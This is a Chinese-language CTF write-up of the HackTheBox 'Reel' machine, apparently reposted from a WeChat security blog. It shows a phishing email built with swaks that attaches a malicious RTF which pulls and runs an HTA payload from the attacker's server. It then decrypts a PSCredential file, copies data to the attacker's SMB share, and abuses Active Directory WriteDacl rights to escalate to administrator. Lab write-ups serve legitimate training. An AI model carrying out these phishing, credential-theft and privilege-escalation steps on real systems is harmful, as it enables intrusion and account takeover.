HackTheBox-windows-Reel

admin 2021年10月24日08:32:48安全文章评论30 views2514字阅读8分22秒阅读模式

大余安全  

一个每日分享渗透小技巧的公众号HackTheBox-windows-Reel



大家好,这里是 大余安全 的第 76 篇文章,本公众号会每日分享攻防渗透技术给大家。


HackTheBox-windows-Reel

靶机地址:https://www.hackthebox.eu/home/machines/profile/143

靶机难度:中级(5.0/10)

靶机发布日期:2018年11月10日

靶机描述:

Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter, and highlights a technique for gaining privileges in an Active Directory environment.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

HackTheBox-windows-Reel



HackTheBox-windows-Reel

一、信息收集



HackTheBox-windows-Reel

可以看到靶机的IP是10.10.10.77....

HackTheBox-windows-Reel

HackTheBox-windows-Reel

HackTheBox-windows-Reel

Nmap可以看到这是一台Windows Server 2012 R2服务器,该服务器承载FTP,SSH,SMTP和Active Directory域等服务...

可以看到nmap发现ftp是可以匿名访问的...并且存在documents目录...进去看看...

HackTheBox-windows-Reel

将documents目录文件全都下载了...

HackTheBox-windows-Reel

意思是可以发送xtf格式的电子邮件给靶机...继续查看下一个文件

HackTheBox-windows-Reel

果然,查看到了电子邮件[email protected]

这边有了电子邮件号,肯定是要给他发邮件的,而且发送的邮件内容得是.xtf的...这里又可以用钓鱼邮件恶意程序进行提权了...

HackTheBox-windows-Reel

这里我搜索了rtf的漏洞,这是一个Microsoft Office oday漏洞...

这个漏洞利用了.rtf文件(或有些已重命名为.doc),该文件将连接到远程服务器,然后下载包含HTML应用程序内容的文件,并作为.hta文件来执行,由于.hta是可执行文件,因此攻击者可以在受害者的计算机上执行完整的代码,此逻辑错误还使攻击者可以绕过Microsoft开发的任何基于内存的缓解措施来执行....(可怕的oday漏洞)

HackTheBox-windows-Reel

查找到了exploit,走起

HackTheBox-windows-Reel

配置好后,这里还需要修改FILENAME为.rtf即可...

HackTheBox-windows-Reel

可以看到创建好了恶意程序.rtf文件...而且还托管在了default.hta上...

HackTheBox-windows-Reel

HackTheBox-windows-Reel

swaks --to nico@megabank.com --server 10.10.10.77 --attach /root/.msf4/local/dayu.rtf

可以看到成功获得了shell壳...

这里还可以利用mutt、sendemail、telnet等等工具进行发送邮件...不演示了...最近头疼得厉害...

并且直接获得了user信息...

HackTheBox-windows-Reel

可以看到,在desktop下还存在xml文件,查看后发现了有用的信息...

获得的信息有:XML文件、Objs版本是1.1.0.1、PSC的凭证、用户名:Tom、密码:哈希值...

那么需要破解这个哈希值即可...

找了半天以为是很好破解的哈希值,这里我还注意到了一个信息...PSCredential

PSCredential是powershell中的一个对象,该对象提供了一种存储用户名,密码和凭据的方法,还有两个功能,Import-CliXml和Export-CliXml,用于将这些凭据保存到文件或从文件中还原他,开始利用...

HackTheBox-windows-Reel

powershell " $credential = Import-CliXml -Path 'C:UsersnicoDesktopcred.xml' ; $credential.getnetworkcredential() | fl *"

可以看到已经获得了密码...

HackTheBox-windows-Reel

可以看到在Tom的桌面上,有一个名为Bloodhound的文件夹和一个文件note.txt...

文件里告诉我们,SharpHound允许我们发现Active Directory环境中的隐藏依赖关系,并且与BloodHound一起在图形界面中形成依赖关系..

HackTheBox-windows-Reel

继续往下看,可以看到存在了关系图BloodHound...把acls.csv放到本地,进行查看即可...可以利用smbserver共享传递即可...

net use z: \10.10.14.11share

copy "文件" z:

这里我就不说分析BloodHound的事情了...头很疼...也忘了截图...

HackTheBox-windows-Reel

这里利用了系统里的PowerView.ps1,然后powershell下利用对象进行修改了claire用户的密码...成功修改...

HackTheBox-windows-Reel

经过前面的信息,知道clair对Backup_Admins组具有WriteDacl权限,我可以用它来将她添加到群组中。首先,看到该组的唯一成员是ranj...

然后把chair加入进去...

可以看到已经成功加入了...但是没生效,得重新登录...

HackTheBox-windows-Reel

重新登录后...以claire和Backup_Admins的身份返回,可以检查Administrator文件夹上的权限了...

HackTheBox-windows-Reel

这里可以看到root信息还无法查看...继续往下走,在BackupScript.ps1里发现了passwd...这是管理员的密码...真是一环套一环...

HackTheBox-windows-Reel

成功获得root信息...

HackTheBox-windows-Reel

今天头很疼,但是还是下班后坚持拿下了这台靶机...加油吧,努力的人都很幸运!!!


由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了中级靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。


HackTheBox-windows-Reel


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-windows-Reel
HackTheBox-windows-Reel


HackTheBox-windows-Reel


随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-windows-Reel

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-windows-Reel

本文始发于微信公众号(大余安全):HackTheBox-windows-Reel

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月24日08:32:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  HackTheBox-windows-Reel http://cn-sec.com/archives/407111.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: